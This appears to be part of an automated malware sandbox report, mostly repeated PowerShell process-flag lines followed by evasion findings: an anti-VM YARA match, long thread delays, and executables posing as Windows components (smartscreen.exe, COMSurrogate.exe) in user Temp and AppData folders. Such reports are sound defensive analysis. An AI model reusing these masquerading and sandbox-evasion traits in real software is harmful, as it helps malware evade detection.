                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                                  Malware Analysis System Evasion

                                  barindex
                                  Yara detected AntiVM3
                                  Source: Yara matchFile source: 00000016.00000002.4571175471.0000000002D1D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeMemory allocated: E60000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeMemory allocated: 2B80000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeMemory allocated: 4B80000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeMemory allocated: 1EB2AE80000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeMemory allocated: 1EB44780000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeMemory allocated: 1EE644D0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeMemory allocated: 1EE7DD60000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeMemory allocated: 216414A0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeMemory allocated: 2165AF30000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeMemory allocated: 1F788C50000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeMemory allocated: 1F7A2820000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeMemory allocated: 215335C0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\smartscreen.exeMemory allocated: 2154D000000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeMemory allocated: 2748E2B0000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeMemory allocated: 274A7D20000 memory reserve | memory write watch
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Users\user\AppData\Local\asm\COMSurrogate.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\Dr.comWindow / User API: threadDelayed 4443Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeWindow / User API: threadDelayed 5806Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\491505\RegAsm.exeWindow / User API: threadDelayed 3873Jump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5588
